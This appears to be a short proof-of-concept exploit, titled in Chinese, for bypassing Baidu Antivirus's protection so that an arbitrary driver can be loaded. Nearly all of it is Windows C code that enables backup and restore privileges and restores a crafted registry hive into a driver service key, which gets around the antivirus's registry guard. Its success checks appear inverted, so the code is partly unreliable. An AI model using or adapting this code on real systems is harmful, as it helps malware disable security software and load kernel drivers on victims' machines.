再再绕百度杀毒任意加载驱动(POC)

BOOL EnableDebugPriv(LPCTSTR lpName){BOOL bRet = FALSE;HANDLE hToken = NULL;TOKEN_PRIVILEGES tp;LUID luid;do{if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))break;if(!LookupPrivilegeValue(NULL,lpName,&luid))break;tp.PrivilegeCount = 1;tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;tp.Privileges[0].Luid = luid;bRet = AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL);}while(FALSE);if(hToken != NULL)CloseHandle(hToken);return bRet;}BOOL DumpReg(HKEY hKey,LPCSTR lpSubKey,TCHAR szFilePath[MAX_PATH]){BOOL bRet = FALSE;HKEY hCur = NULL;do{if(!EnableDebugPriv(SE_BACKUP_NAME))break;if(RegOpenKeyEx(hKey,lpSubKey,NULL,KEY_ALL_ACCESS,&hCur) != ERROR_SUCCESS)break;if(RegSaveKey(hCur,szFilePath,NULL) != ERROR_SUCCESS)bRet = TRUE;}while(FALSE);if(hCur)RegCloseKey(hCur);return bRet;}BOOL RestoreReg(HKEY hKey,LPCSTR lpSubKey,TCHAR szFilePath[MAX_PATH]){BOOL bRet = FALSE;HKEY hCur = NULL;do{if(!EnableDebugPriv(SE_RESTORE_NAME))break;if(RegOpenKeyEx(hKey,lpSubKey,NULL,KEY_ALL_ACCESS,&hCur) != ERROR_SUCCESS &&RegCreateKey(hKey,lpSubKey,&hCur) != ERROR_SUCCESS)break;if(RegRestoreKey(hCur,szFilePath,REG_FORCE_RESTORE) != ERROR_SUCCESS)bRet = TRUE;}while(FALSE);if(hCur)RegCloseKey(hCur);return bRet;}int main(int argc, char* argv[]){//先本地构造生成一个poc hiv文件// DumpReg(HKEY_LOCAL_MACHINE,"SYSTEM//CurrentControlSet//Services//poc","C://poc.hiv");//远程饶过写注册表加载驱动RestoreReg(HKEY_LOCAL_MACHINE,"SYSTEM//CurrentControlSet//Services//poc","C://poc.hiv");return 0;}